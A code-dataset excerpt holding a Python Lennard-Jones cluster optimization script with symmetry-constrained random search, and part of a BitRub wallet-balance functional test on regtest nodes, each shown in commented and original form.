    N_atom = int(len(pos)/dim)
    pos = np.reshape(pos, (N_atom, dim))
    # Pairwise LJ sum: 4*(r^-12 - r^-6) over all unique atom pairs.
    distance = pdist(pos)
    r6 = np.power(distance, 6)
    r12 = np.multiply(r6, r6)
    Eng = np.sum(4*(1/r12 - 1/r6))
    if dim > 3:
        # Harmonic penalty 0.5*mu*sum(x^2) over every auxiliary coordinate,
        # vectorized instead of the original per-dimension loop (same value).
        Eng += 0.5 * mu * np.sum(pos[:, 3:] ** 2)
    return Eng
def LJ_force(pos, dim, mu=0.1):
    """
    Analytic gradient of `LJ` with respect to the positions.

    Despite the name, the returned array is the gradient dE/dx (not the
    force -dE/dx): it is passed as ``jac=`` to scipy.optimize.minimize,
    which expects the objective's gradient, and the penalty term below
    is +mu*x = d(0.5*mu*x^2)/dx, consistent with that.

    Args:
        pos: 1D array with N*dim numbers representing the atomic positions
        dim: dimension of the hyper/normal space
        mu: strength of the harmonic penalty on the extra coordinates

    Returns:
        flattened (N*dim,) gradient array
    """
    N_atom = int(len(pos)/dim)
    pos = np.reshape(pos, [N_atom, dim])
    force = np.zeros([N_atom, dim])
    for i, pos0 in enumerate(pos):
        # np.delete already returns a copy, so the original deepcopy
        # of the whole array was redundant.
        pos1 = np.delete(pos, i, 0)
        distance = cdist([pos0], pos1)
        r = pos1 - pos0
        r2 = np.power(distance, 2)
        r6 = np.power(r2, 3)
        r12 = np.power(r6, 2)
        force[i] = np.dot((48/r12-24/r6)/r2, r)
    if dim > 3:
        # Penalty gradient mu*x on every auxiliary coordinate, vectorized
        # instead of the original per-atom inner loop (same values).
        force[:, 3:] += mu * pos[:, 3:]
    return force.flatten()
def single_optimize(pos, dim=3, kt=0.5, mu=0.1):
    """
    Relax one cluster with conjugate-gradient minimization of `LJ`.

    Args:
        pos: N*dim0 array representing the atomic positions
        dim: dimension of the hyper/normal space to optimize in
        kt: perturbation factor (kept for interface compatibility)
        mu: penalty strength forwarded to LJ / LJ_force

    Returns:
        energy: optimized energy
        pos: optimized N*dim position array
    """
    N_atom = len(pos)
    extra = dim - np.shape(pos)[1]
    # Pad with small random coordinates when the target space is larger;
    # truncate the trailing columns when it is smaller.
    if extra > 0:
        pad = 0.5 * (np.random.random([N_atom, extra]) - 0.5)
        pos = np.hstack((pos, pad))
    elif extra < 0:
        pos = pos[:, :dim]
    res = minimize(LJ, pos.flatten(), args=(dim, mu), jac=LJ_force,
                   method='CG', tol=1e-3)
    return res.fun, np.reshape(res.x, (N_atom, dim))
def parse_symmetry(pos):
    """Return the Schoenflies point-group symbol for a set of positions.

    The coordinates are wrapped in a dummy all-carbon Molecule; 'N/A' is
    returned when pymatgen's analyzer fails.
    """
    mol = Molecule(['C']*len(pos), pos)
    try:
        symbol = PointGroupAnalyzer(mol, tolerance=0.1).sch_symbol
    except Exception:
        # Narrowed from a bare "except:" so KeyboardInterrupt and
        # SystemExit still propagate instead of being swallowed.
        symbol = 'N/A'
    return symbol
class LJ_prediction():
    """
    Global optimization of Lennard-Jones clusters by random symmetric
    starts (pyxtal point-group clusters) followed by CG relaxation,
    optionally through a higher-dimensional space (dim > 3).

    Args:
        numIons: number of atoms in the cluster; the reference energy and
            point group are looked up in pyxtal's 'clusters' collection.

    Attributes:
        numIons: cluster size
        reference: reference record with 'energy' and 'pointgroup'
        time0: wall-clock start time used for progress reporting
    """
    def __init__(self, numIons):
        self.numIons = numIons
        ref = Collection('clusters')[str(numIons)]
        print('\nReference for LJ {0:3d} is {1:12.3f} eV, PG: {2:4s}'.\
               format(numIons, ref['energy'], ref['pointgroup']))
        self.reference = ref
        self.time0 = time()
    def generate_cluster(self, pgs = range(2, 33)):
        """Sample random point groups until a valid cluster is produced;
        return its Cartesian coordinates."""
        run = True
        while run:
            pg = choice(pgs)
            cluster = random_cluster(pg, ['Mo'], [self.numIons], 1.0)
            if cluster.valid:
                run = False
        return cluster.cart_coords
    def predict(self, dim=3, maxN=100, ncpu=2, pgs=range(2, 33)):
        """Run maxN independent relaxations (in parallel when ncpu > 1)
        and report how often the reference ground state was hit."""
        print('\nPerforming random search at {0:d}D space\n'.format(dim))
        cycle = range(maxN)
        if ncpu > 1:
            from multiprocessing import Pool
            from functools import partial
            with Pool(ncpu) as p:
                func = partial(self.relaxation, dim, pgs)
                res = p.map(func, cycle)
                p.close()
                p.join()
        else:
            res=[]
            for i in cycle:
                res.append(self.relaxation(dim, pgs, i))
        N_success = 0
        for dct in res:
            if dct['ground']:
                N_success +=1
        print('\nHit the ground state {0:4d} times out of {1:4d} attempts\n'.\
                format(N_success, maxN))
        return res
    def relaxation(self, dim, pgs, ind):
        """Generate one random cluster and relax it; return a result dict.

        For dim > 3 the relaxation alternates 3D -> dim-D -> 3D until the
        3D energy stops improving (within 1e-3), which lets the search
        escape 3D local minima through the auxiliary dimensions.
        """
        pos = self.generate_cluster(pgs)
        pg1 = parse_symmetry(pos)
        if dim == 3:
            [energy, pos] = single_optimize(pos, 3)
        else:
            do = True
            while do:
                [energy1, pos1] = single_optimize(pos, 3)
                [energy2, pos2] = single_optimize(pos1, dim)
                [energy3, pos3] = single_optimize(pos2, 3)
                #print(energy1, energy2, energy3)
                if abs(energy3-energy1) < 1e-3 or energy3 > energy1:
                    pos = pos1
                    energy = energy1
                    do = False
                    #print('stop')
                else:
                    pos = pos3
        # Ground-state check against the tabulated reference energy.
        if abs(energy-self.reference['energy']) <1e-3:
            ground = True
        elif energy < self.reference['energy']:
            ground = True
            print(" --- ENERGY LOWER THAN REFERENCE FOUND ---")
        else:
            ground = False
        pg2 = parse_symmetry(pos)
        res = {'pos': pos,
               'energy': energy,
               'pg_init': pg1,
               'pg_finial': pg2,
               'ground': ground,
               'id': ind,
              }
        # Report every hit immediately; otherwise report every 10th run.
        if ground:
            print('ID: {0:4d} PG initial: {1:4s} relaxed: {2:4s} Energy: {3:12.3f} Time: {4:6.1f} ++++++'.\
                   format(ind, pg1, pg2, energy, (time()-self.time0)/60))
        elif ind%10 == 0:
            print('ID: {0:4d} PG initial: {1:4s} relaxed: {2:4s} Energy: {3:12.3f} Time: {4:6.1f} '.\
                   format(ind, pg1, pg2, energy, (time()-self.time0)/60))
        return res
if __name__ == "__main__":
    # -------------------------------- Options -------------------------
    parser = OptionParser()
    parser.add_option("-d", "--dimension", dest="dim", metavar='dim', default=3, type=int,
                      help="dimension, 3 or higher")
    parser.add_option("-n", "--numIons", dest="numIons", default=16, type=int,
                      help="desired numbers of atoms: 16")
    parser.add_option("-m", "--max", dest="max", default=100, type=int,
                      help="maximum number of attempts")
    parser.add_option("-p", "--proc", dest="proc", default=1, type=int,
                      help="number of processors, default 1")

    (options, args) = parser.parse_args()
    N = options.numIons
    maxN = options.max
    dim = options.dim
    ncpu = options.proc

    lj_run = LJ_prediction(N)
    eng_min = lj_run.reference['energy']

    # Run the same random search under four sampling strategies so the
    # benefit of symmetry constraints can be compared.
    t0 = time()
    print("---No symmetry---")
    results1 = lj_run.predict(dim=dim, maxN=maxN, ncpu=ncpu, pgs=[1])
    print('time: {0:6.2f} seconds'.format(time()-t0))
    print("---Random symmetry---")
    results2 = lj_run.predict(dim=dim, maxN=maxN, ncpu=ncpu, pgs=range(2, 33))
    print('time: {0:6.2f} seconds'.format(time()-t0))
    print("---Oh only---")
    results3 = lj_run.predict(dim=dim, maxN=maxN, ncpu=ncpu, pgs=[32])
    print('time: {0:6.2f} seconds'.format(time()-t0))
    print("---Random symmetry (not Oh)---")
    results4 = lj_run.predict(dim=dim, maxN=maxN, ncpu=ncpu, pgs=range(2, 32))
    print('time: {0:6.2f} seconds'.format(time()-t0))

    def summarize(results):
        """Return (energies as ndarray, number of ground-state hits)."""
        energies = np.array([dct['energy'] for dct in results])
        hits = sum(1 for dct in results if dct['ground'])
        return energies, hits

    # Replaces four copy-pasted counting loops with one helper.
    eng1, ground1 = summarize(results1)
    eng2, ground2 = summarize(results2)
    eng3, ground3 = summarize(results3)
    eng4, ground4 = summarize(results4)

    # Histogram 1: free search vs random point-group constrained search.
    bins = np.linspace(eng_min-0.1, 0.1, 100)
    plt.hist(eng1, bins, alpha=0.5, label='no symmetry: ' + str(ground1) + '/' + str(len(eng1)))
    plt.hist(eng2, bins, alpha=0.5, label='random point groups: ' + str(ground2) + '/' + str(len(eng2)))
    plt.xlabel('Energy (eV)')
    plt.ylabel('Counts')
    plt.legend(loc=1)
    plt.title('LJ cluster: ' + str(N) + ' Ground state: ' + str(eng_min))
    plt.savefig(str(N)+'-'+str(maxN)+'-'+str(dim)+'.pdf')
    plt.close()

    # Histogram 2: Oh-only search vs random point groups excluding Oh.
    # (bins are identical to the first histogram, so they are reused.)
    plt.hist(eng3, bins, alpha=0.5, label='Oh only: ' + str(ground3) + '/' + str(len(eng3)))
    plt.hist(eng4, bins, alpha=0.5, label='random point groups (excluding Oh): ' + str(ground4) + '/' + str(len(eng4)))
    plt.xlabel('Energy (eV)')
    plt.ylabel('Counts')
    plt.legend(loc=1)
    plt.title('LJ cluster: ' + str(N) + ' Ground state: ' + str(eng_min))
    plt.savefig(str(N)+'-'+str(maxN)+'-'+str(dim)+'_single.pdf')
    plt.close()
| 33.250871 | 119 | 0.551085 | from pyxtal.crystal import random_cluster
from copy import deepcopy
from optparse import OptionParser
from random import randint, choice
from scipy.optimize import minimize
from scipy.spatial.distance import pdist, cdist
from pyxtal.molecule import PointGroupAnalyzer
from pymatgen import Molecule
from pyxtal.database.collection import Collection
from time import time
import numpy as np
import matplotlib.pyplot as plt
import warnings
plt.style.use("bmh")
warnings.filterwarnings("ignore")
def LJ(pos, dim, mu=0.1):
    """Lennard-Jones energy of a cluster given as a flat coordinate vector.

    The vector is reshaped to (N, dim).  Pair energies 4*(r^-12 - r^-6)
    are summed over all unique pairs; when dim > 3 the coordinates beyond
    the third axis receive a harmonic penalty 0.5*mu*sum(x^2) that drives
    the optimizer back towards physical 3D space.
    """
    n_atoms = int(len(pos) / dim)
    coords = np.reshape(pos, (n_atoms, dim))
    r6 = np.power(pdist(coords), 6)
    r12 = np.multiply(r6, r6)
    energy = np.sum(4 * (1 / r12 - 1 / r6))
    if dim > 3:
        # Harmonic penalty on the hyper-dimensional coordinates.
        extra = coords[:, 3:dim]
        energy += 0.5 * mu * np.sum(np.multiply(extra, extra))
    return energy
def LJ_force(pos, dim, mu=0.1):
    """Analytic gradient of LJ(), used as ``jac`` for scipy.optimize.minimize.

    For each atom the pairwise contribution (48*r^-14 - 24*r^-8)*(r_j - r_i)
    is accumulated; for dim > 3 the gradient of the harmonic penalty,
    mu * x, is added on the extra coordinates.  Returns a flat vector
    matching the layout of ``pos``.
    """
    n_atoms = int(len(pos) / dim)
    coords = np.reshape(pos, [n_atoms, dim])
    grad = np.zeros([n_atoms, dim])
    for i in range(n_atoms):
        center = coords[i]
        others = np.delete(coords, i, 0)
        dist = cdist([center], others)
        rvec = others - center
        r2 = np.power(dist, 2)
        r6 = np.power(r2, 3)
        r12 = np.power(r6, 2)
        grad[i] = np.dot((48 / r12 - 24 / r6) / r2, rvec)
        if dim > 3:
            # Gradient of the penalty 0.5*mu*x^2 is mu*x.
            grad[i, 3:dim] += mu * coords[i, 3:dim]
    return grad.flatten()
def single_optimize(pos, dim=3, kt=0.5, mu=0.1):
    """
    Perform a CG relaxation of a single cluster.

    Args:
        pos: N x d array of atomic positions
        dim: dimension of the hyper/normal space used for the relaxation
        kt: perturbation factor (currently unused; kept for API compatibility)
        mu: weight of the harmonic penalty on the extra dimensions

    Returns:
        energy: optimized energy
        pos: optimized positions, shape (N, dim)
    """
    N_atom = len(pos)
    diff = dim - np.shape(pos)[1]
    # If the input has fewer dimensions than requested, pad the missing ones
    # with small random values; if it has more, truncate them.
    if diff > 0:
        pos = np.hstack((pos, 0.5*(np.random.random([N_atom, diff])-0.5) ))
    elif diff < 0:
        pos = pos[:, :dim]
    pos = pos.flatten()
    res = minimize(LJ, pos, args=(dim, mu), jac=LJ_force, method='CG', tol=1e-3)
    pos = np.reshape(res.x, (N_atom, dim))
    energy = res.fun
    return energy, pos
def parse_symmetry(pos):
    """Return the Schoenflies point-group symbol of a cluster.

    The coordinates are wrapped in a dummy all-carbon molecule so that
    pymatgen's PointGroupAnalyzer can perform the detection.

    Args:
        pos: N x 3 array of Cartesian coordinates

    Returns:
        The Schoenflies symbol as a string, or 'N/A' when the analysis fails.
    """
    mol = Molecule(['C'] * len(pos), pos)
    try:
        symbol = PointGroupAnalyzer(mol, tolerance=0.1).sch_symbol
    except Exception:
        # A bare except would also swallow KeyboardInterrupt/SystemExit;
        # catch only genuine analysis failures.
        symbol = 'N/A'
    return symbol
class LJ_prediction():
def __init__(self, numIons):
self.numIons = numIons
ref = Collection('clusters')[str(numIons)]
print('\nReference for LJ {0:3d} is {1:12.3f} eV, PG: {2:4s}'.\
format(numIons, ref['energy'], ref['pointgroup']))
self.reference = ref
self.time0 = time()
def generate_cluster(self, pgs = range(2, 33)):
run = True
while run:
pg = choice(pgs)
cluster = random_cluster(pg, ['Mo'], [self.numIons], 1.0)
if cluster.valid:
run = False
return cluster.cart_coords
def predict(self, dim=3, maxN=100, ncpu=2, pgs=range(2, 33)):
print('\nPerforming random search at {0:d}D space\n'.format(dim))
cycle = range(maxN)
if ncpu > 1:
from multiprocessing import Pool
from functools import partial
with Pool(ncpu) as p:
func = partial(self.relaxation, dim, pgs)
res = p.map(func, cycle)
p.close()
p.join()
else:
res=[]
for i in cycle:
res.append(self.relaxation(dim, pgs, i))
N_success = 0
for dct in res:
if dct['ground']:
N_success +=1
print('\nHit the ground state {0:4d} times out of {1:4d} attempts\n'.\
format(N_success, maxN))
return res
def relaxation(self, dim, pgs, ind):
pos = self.generate_cluster(pgs)
pg1 = parse_symmetry(pos)
if dim == 3:
[energy, pos] = single_optimize(pos, 3)
else:
do = True
while do:
[energy1, pos1] = single_optimize(pos, 3)
[energy2, pos2] = single_optimize(pos1, dim)
[energy3, pos3] = single_optimize(pos2, 3)
if abs(energy3-energy1) < 1e-3 or energy3 > energy1:
pos = pos1
energy = energy1
do = False
else:
pos = pos3
if abs(energy-self.reference['energy']) <1e-3:
ground = True
elif energy < self.reference['energy']:
ground = True
print(" --- ENERGY LOWER THAN REFERENCE FOUND ---")
else:
ground = False
pg2 = parse_symmetry(pos)
res = {'pos': pos,
'energy': energy,
'pg_init': pg1,
'pg_finial': pg2,
'ground': ground,
'id': ind,
}
if ground:
print('ID: {0:4d} PG initial: {1:4s} relaxed: {2:4s} Energy: {3:12.3f} Time: {4:6.1f} ++++++'.\
format(ind, pg1, pg2, energy, (time()-self.time0)/60))
elif ind%10 == 0:
print('ID: {0:4d} PG initial: {1:4s} relaxed: {2:4s} Energy: {3:12.3f} Time: {4:6.1f} '.\
format(ind, pg1, pg2, energy, (time()-self.time0)/60))
return res
if __name__ == "__main__":
parser = OptionParser()
parser.add_option("-d", "--dimension", dest="dim", metavar='dim', default=3, type=int,
help="dimension, 3 or higher")
parser.add_option("-n", "--numIons", dest="numIons", default=16, type=int,
help="desired numbers of atoms: 16")
parser.add_option("-m", "--max", dest="max", default=100, type=int,
help="maximum number of attempts")
parser.add_option("-p", "--proc", dest="proc", default=1, type=int,
help="number of processors, default 1")
(options, args) = parser.parse_args()
N = options.numIons
maxN = options.max
dim = options.dim
ncpu = options.proc
lj_run = LJ_prediction(N)
eng_min = lj_run.reference['energy']
t0 = time()
print("---No symmetry---")
results1 = lj_run.predict(dim=dim, maxN=maxN, ncpu=ncpu, pgs=[1])
print('time: {0:6.2f} seconds'.format(time()-t0))
print("---Random symmetry---")
results2 = lj_run.predict(dim=dim, maxN=maxN, ncpu=ncpu, pgs=range(2, 33))
print('time: {0:6.2f} seconds'.format(time()-t0))
print("---Oh only---")
results3 = lj_run.predict(dim=dim, maxN=maxN, ncpu=ncpu, pgs=[32])
print('time: {0:6.2f} seconds'.format(time()-t0))
print("---Random symmetry (not Oh)---")
results4 = lj_run.predict(dim=dim, maxN=maxN, ncpu=ncpu, pgs=range(2, 32))
print('time: {0:6.2f} seconds'.format(time()-t0))
eng1 = []
eng2 = []
eng3 = []
eng4 = []
ground1 = 0
ground2 = 0
ground3 = 0
ground4 = 0
for dct in results1:
if dct['ground']:
ground1 += 1
eng1.append(dct['energy'])
for dct in results2:
if dct['ground']:
ground2 += 1
eng2.append(dct['energy'])
for dct in results3:
if dct['ground']:
ground3 += 1
eng3.append(dct['energy'])
for dct in results4:
if dct['ground']:
ground4 += 1
eng4.append(dct['energy'])
eng1 = np.array(eng1)
eng2 = np.array(eng2)
eng3 = np.array(eng3)
eng4 = np.array(eng4)
eng_max = max([max(eng1), max(eng2)])
bins = np.linspace(eng_min-0.1, 0.1, 100)
plt.hist(eng1, bins, alpha=0.5, label='no symmetry: ' + str(ground1) + '/' + str(len(eng1)))
plt.hist(eng2, bins, alpha=0.5, label='random point groups: ' + str(ground2) + '/' + str(len(eng2)))
plt.xlabel('Energy (eV)')
plt.ylabel('Counts')
plt.legend(loc=1)
plt.title('LJ cluster: ' + str(N) + ' Ground state: ' + str(eng_min))
plt.savefig(str(N)+'-'+str(maxN)+'-'+str(dim)+'.pdf')
plt.close()
eng_max = max([max(eng3), max(eng4)])
bins = np.linspace(eng_min-0.1, 0.1, 100)
plt.hist(eng3, bins, alpha=0.5, label='Oh only: ' + str(ground3) + '/' + str(len(eng3)))
plt.hist(eng4, bins, alpha=0.5, label='random point groups (excluding Oh): ' + str(ground4) + '/' + str(len(eng4)))
plt.xlabel('Energy (eV)')
plt.ylabel('Counts')
plt.legend(loc=1)
plt.title('LJ cluster: ' + str(N) + ' Ground state: ' + str(eng_min))
plt.savefig(str(N)+'-'+str(maxN)+'-'+str(dim)+'_single.pdf')
plt.close()
| true | true |
f7191733ac9155fe9da162a2124c9882e8a0a396 | 12,464 | py | Python | test/functional/wallet_balance.py | bitcorub/bitrub | 28711e4e8ebdee144a1437ece07afcf792a7cf60 | [
"MIT"
] | 1 | 2019-12-09T18:33:47.000Z | 2019-12-09T18:33:47.000Z | test/functional/wallet_balance.py | bitcorub/bitrub | 28711e4e8ebdee144a1437ece07afcf792a7cf60 | [
"MIT"
] | null | null | null | test/functional/wallet_balance.py | bitcorub/bitrub | 28711e4e8ebdee144a1437ece07afcf792a7cf60 | [
"MIT"
] | 1 | 2019-12-12T20:05:36.000Z | 2019-12-12T20:05:36.000Z | #!/usr/bin/env python3
# Copyright (c) 2018-2019 The BitRub Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test the wallet balance RPC methods."""
from decimal import Decimal
import struct
from test_framework.address import ADDRESS_BCRT1_UNSPENDABLE as ADDRESS_WATCHONLY
from test_framework.test_framework import BitRubTestFramework
from test_framework.util import (
assert_equal,
assert_raises_rpc_error,
connect_nodes,
sync_blocks,
)
def create_transactions(node, address, amt, fees):
    """Build and sign raw transactions sending ``amt`` from node to address.

    One transaction is created per entry in ``fees``; all of them spend the
    same greedily-gathered inputs.  Returns the list of results from
    signrawtransactionwithwallet.
    """
    spendable = [u for u in node.listunspent(0) if u['spendable']]

    # Gather inputs until they cover the amount plus the largest fee.
    inputs = []
    gathered = 0
    for utxo in spendable:
        inputs.append({"txid": utxo["txid"], "vout": utxo["vout"]})
        gathered += utxo['amount']
        if gathered >= amt + max(fees):
            break
    # make sure there were enough utxos
    assert gathered >= amt + max(fees)

    signed = []
    for fee in fees:
        outputs = {address: amt}
        change = gathered - amt - fee
        # prevent 0 change output
        if change > 0:
            outputs[node.getrawchangeaddress()] = change
        raw_tx = node.createrawtransaction(inputs, outputs, 0, True)
        raw_tx = node.signrawtransactionwithwallet(raw_tx)
        assert_equal(raw_tx['complete'], True)
        signed.append(raw_tx)
    return signed
class WalletTest(BitRubTestFramework):
    """Exercise the wallet balance RPCs (getbalance, getbalances,
    getunconfirmedbalance) across confirmed, unconfirmed, conflicted and
    reorged transactions on a two-node network."""

    def set_test_params(self):
        # Two nodes on a fresh chain; node 0 uses a descendant limit so that
        # some wallet transactions are later rejected from the mempool.
        self.num_nodes = 2
        self.setup_clean_chain = True
        self.extra_args = [
            ['-limitdescendantcount=3'], # Limit mempool descendants as a hack to have wallet txs rejected from the mempool
            [],
        ]

    def skip_test_if_missing_module(self):
        # This test requires a wallet-enabled build.
        self.skip_if_no_wallet()

    def run_test(self):
        self.nodes[0].importaddress(ADDRESS_WATCHONLY)
        # Check that nodes don't own any UTXOs
        assert_equal(len(self.nodes[0].listunspent()), 0)
        assert_equal(len(self.nodes[1].listunspent()), 0)

        self.log.info("Check that only node 0 is watching an address")
        assert 'watchonly' in self.nodes[0].getbalances()
        assert 'watchonly' not in self.nodes[1].getbalances()

        self.log.info("Mining blocks ...")
        self.nodes[0].generate(1)
        self.sync_all()
        self.nodes[1].generate(1)
        self.nodes[1].generatetoaddress(101, ADDRESS_WATCHONLY)
        self.sync_all()

        assert_equal(self.nodes[0].getbalances()['mine']['trusted'], 50)
        assert_equal(self.nodes[0].getwalletinfo()['balance'], 50)
        assert_equal(self.nodes[1].getbalances()['mine']['trusted'], 50)
        assert_equal(self.nodes[0].getbalances()['watchonly']['immature'], 5000)
        assert 'watchonly' not in self.nodes[1].getbalances()

        assert_equal(self.nodes[0].getbalance(), 50)
        assert_equal(self.nodes[1].getbalance(), 50)

        self.log.info("Test getbalance with different arguments")
        assert_equal(self.nodes[0].getbalance("*"), 50)
        assert_equal(self.nodes[0].getbalance("*", 1), 50)
        assert_equal(self.nodes[0].getbalance("*", 1, True), 100)
        assert_equal(self.nodes[0].getbalance(minconf=1), 50)
        assert_equal(self.nodes[0].getbalance(minconf=0, include_watchonly=True), 100)
        assert_equal(self.nodes[1].getbalance(minconf=0, include_watchonly=True), 50)

        # Send 40 BTR from 0 to 1 and 60 BTR from 1 to 0.
        txs = create_transactions(self.nodes[0], self.nodes[1].getnewaddress(), 40, [Decimal('0.01')])
        self.nodes[0].sendrawtransaction(txs[0]['hex'])
        self.nodes[1].sendrawtransaction(txs[0]['hex'])  # sending on both nodes is faster than waiting for propagation
        self.sync_all()

        txs = create_transactions(self.nodes[1], self.nodes[0].getnewaddress(), 60, [Decimal('0.01'), Decimal('0.02')])
        self.nodes[1].sendrawtransaction(txs[0]['hex'])
        self.nodes[0].sendrawtransaction(txs[0]['hex'])  # sending on both nodes is faster than waiting for propagation
        self.sync_all()

        # First argument of getbalance must be set to "*"
        assert_raises_rpc_error(-32, "dummy first argument must be excluded or set to \"*\"", self.nodes[1].getbalance, "")

        self.log.info("Test getbalance and getunconfirmedbalance with unconfirmed inputs")

        # Before `test_balance()`, we have had two nodes with a balance of 50
        # each and then we:
        #
        # 1) Sent 40 from node A to node B with fee 0.01
        # 2) Sent 60 from node B to node A with fee 0.01
        #
        # Then we check the balances:
        #
        # 1) As is
        # 2) With transaction 2 from above with 2x the fee
        #
        # Prior to #16766, in this situation, the node would immediately report
        # a balance of 30 on node B as unconfirmed and trusted.
        #
        # After #16766, we show that balance as unconfirmed.
        #
        # The balance is indeed "trusted" and "confirmed" insofar as removing
        # the mempool transactions would return at least that much money. But
        # the algorithm after #16766 marks it as unconfirmed because the 'taint'
        # tracking of transaction trust for summing balances doesn't consider
        # which inputs belong to a user. In this case, the change output in
        # question could be "destroyed" by replace the 1st transaction above.
        #
        # The post #16766 behavior is correct; we shouldn't be treating those
        # funds as confirmed. If you want to rely on that specific UTXO existing
        # which has given you that balance, you cannot, as a third party
        # spending the other input would destroy that unconfirmed.
        #
        # For example, if the test transactions were:
        #
        # 1) Sent 40 from node A to node B with fee 0.01
        # 2) Sent 10 from node B to node A with fee 0.01
        #
        # Then our node would report a confirmed balance of 40 + 50 - 10 = 80
        # BTR, which is more than would be available if transaction 1 were
        # replaced.

        def test_balances(*, fee_node_1=0):
            # Shared balance checks, re-run after node 1 bumps its fee.
            # getbalance without any arguments includes unconfirmed transactions, but not untrusted transactions
            assert_equal(self.nodes[0].getbalance(), Decimal('9.99'))  # change from node 0's send
            assert_equal(self.nodes[1].getbalance(), Decimal('0'))  # node 1's send had an unsafe input
            # Same with minconf=0
            assert_equal(self.nodes[0].getbalance(minconf=0), Decimal('9.99'))
            assert_equal(self.nodes[1].getbalance(minconf=0), Decimal('0'))
            # getbalance with a minconf incorrectly excludes coins that have been spent more recently than the minconf blocks ago
            # TODO: fix getbalance tracking of coin spentness depth
            assert_equal(self.nodes[0].getbalance(minconf=1), Decimal('0'))
            assert_equal(self.nodes[1].getbalance(minconf=1), Decimal('0'))
            # getunconfirmedbalance
            assert_equal(self.nodes[0].getunconfirmedbalance(), Decimal('60'))  # output of node 1's spend
            assert_equal(self.nodes[0].getbalances()['mine']['untrusted_pending'], Decimal('60'))
            assert_equal(self.nodes[0].getwalletinfo()["unconfirmed_balance"], Decimal('60'))
            assert_equal(self.nodes[1].getunconfirmedbalance(), Decimal('30') - fee_node_1)  # Doesn't include output of node 0's send since it was spent
            assert_equal(self.nodes[1].getbalances()['mine']['untrusted_pending'], Decimal('30') - fee_node_1)
            assert_equal(self.nodes[1].getwalletinfo()["unconfirmed_balance"], Decimal('30') - fee_node_1)

        test_balances(fee_node_1=Decimal('0.01'))

        # Node 1 bumps the transaction fee and resends
        self.nodes[1].sendrawtransaction(txs[1]['hex'])
        self.nodes[0].sendrawtransaction(txs[1]['hex'])  # sending on both nodes is faster than waiting for propagation
        self.sync_all()

        self.log.info("Test getbalance and getunconfirmedbalance with conflicted unconfirmed inputs")
        test_balances(fee_node_1=Decimal('0.02'))

        self.nodes[1].generatetoaddress(1, ADDRESS_WATCHONLY)
        self.sync_all()

        # balances are correct after the transactions are confirmed
        assert_equal(self.nodes[0].getbalance(), Decimal('69.99'))  # node 1's send plus change from node 0's send
        assert_equal(self.nodes[1].getbalance(), Decimal('29.98'))  # change from node 0's send

        # Send total balance away from node 1
        txs = create_transactions(self.nodes[1], self.nodes[0].getnewaddress(), Decimal('29.97'), [Decimal('0.01')])
        self.nodes[1].sendrawtransaction(txs[0]['hex'])
        self.nodes[1].generatetoaddress(2, ADDRESS_WATCHONLY)
        self.sync_all()

        # getbalance with a minconf incorrectly excludes coins that have been spent more recently than the minconf blocks ago
        # TODO: fix getbalance tracking of coin spentness depth
        # getbalance with minconf=3 should still show the old balance
        assert_equal(self.nodes[1].getbalance(minconf=3), Decimal('0'))

        # getbalance with minconf=2 will show the new balance.
        assert_equal(self.nodes[1].getbalance(minconf=2), Decimal('0'))

        # check mempool transactions count for wallet unconfirmed balance after
        # dynamically loading the wallet.
        before = self.nodes[1].getunconfirmedbalance()
        dst = self.nodes[1].getnewaddress()
        self.nodes[1].unloadwallet('')
        self.nodes[0].sendtoaddress(dst, 0.1)
        self.sync_all()
        self.nodes[1].loadwallet('')
        after = self.nodes[1].getunconfirmedbalance()
        assert_equal(before + Decimal('0.1'), after)

        # Create 3 more wallet txs, where the last is not accepted to the
        # mempool because it is the third descendant of the tx above
        for _ in range(3):
            # Set amount high enough such that all coins are spent by each tx
            txid = self.nodes[0].sendtoaddress(self.nodes[0].getnewaddress(), 99)
        self.log.info('Check that wallet txs not in the mempool are untrusted')
        assert txid not in self.nodes[0].getrawmempool()
        assert_equal(self.nodes[0].gettransaction(txid)['trusted'], False)
        assert_equal(self.nodes[0].getbalance(minconf=0), 0)

        self.log.info("Test replacement and reorg of non-mempool tx")
        tx_orig = self.nodes[0].gettransaction(txid)['hex']
        # Increase fee by 1 coin
        tx_replace = tx_orig.replace(
            struct.pack("<q", 99 * 10**8).hex(),
            struct.pack("<q", 98 * 10**8).hex(),
        )
        tx_replace = self.nodes[0].signrawtransactionwithwallet(tx_replace)['hex']
        # Total balance is given by the sum of outputs of the tx
        total_amount = sum([o['value'] for o in self.nodes[0].decoderawtransaction(tx_replace)['vout']])
        self.sync_all()
        self.nodes[1].sendrawtransaction(hexstring=tx_replace, maxfeerate=0)

        # Now confirm tx_replace
        block_reorg = self.nodes[1].generatetoaddress(1, ADDRESS_WATCHONLY)[0]
        self.sync_all()
        assert_equal(self.nodes[0].getbalance(minconf=0), total_amount)

        self.log.info('Put txs back into mempool of node 1 (not node 0)')
        self.nodes[0].invalidateblock(block_reorg)
        self.nodes[1].invalidateblock(block_reorg)
        self.sync_blocks()
        self.nodes[0].syncwithvalidationinterfacequeue()
        assert_equal(self.nodes[0].getbalance(minconf=0), 0)  # wallet txs not in the mempool are untrusted
        self.nodes[0].generatetoaddress(1, ADDRESS_WATCHONLY)
        assert_equal(self.nodes[0].getbalance(minconf=0), 0)  # wallet txs not in the mempool are untrusted

        # Now confirm tx_orig
        self.restart_node(1, ['-persistmempool=0'])
        connect_nodes(self.nodes[0], 1)
        sync_blocks(self.nodes)
        self.nodes[1].sendrawtransaction(tx_orig)
        self.nodes[1].generatetoaddress(1, ADDRESS_WATCHONLY)
        self.sync_all()
        assert_equal(self.nodes[0].getbalance(minconf=0), total_amount + 1)  # The reorg recovered our fee of 1 coin
# Entry point: run the balance test through the functional-test framework.
if __name__ == '__main__':
    WalletTest().main()
| 47.572519 | 153 | 0.656611 |
from decimal import Decimal
import struct
from test_framework.address import ADDRESS_BCRT1_UNSPENDABLE as ADDRESS_WATCHONLY
from test_framework.test_framework import BitRubTestFramework
from test_framework.util import (
assert_equal,
assert_raises_rpc_error,
connect_nodes,
sync_blocks,
)
def create_transactions(node, address, amt, fees):
utxos = [u for u in node.listunspent(0) if u['spendable']]
inputs = []
ins_total = 0
for utxo in utxos:
inputs.append({"txid": utxo["txid"], "vout": utxo["vout"]})
ins_total += utxo['amount']
if ins_total >= amt + max(fees):
break
assert ins_total >= amt + max(fees)
txs = []
for fee in fees:
outputs = {address: amt}
if ins_total > amt + fee:
outputs[node.getrawchangeaddress()] = ins_total - amt - fee
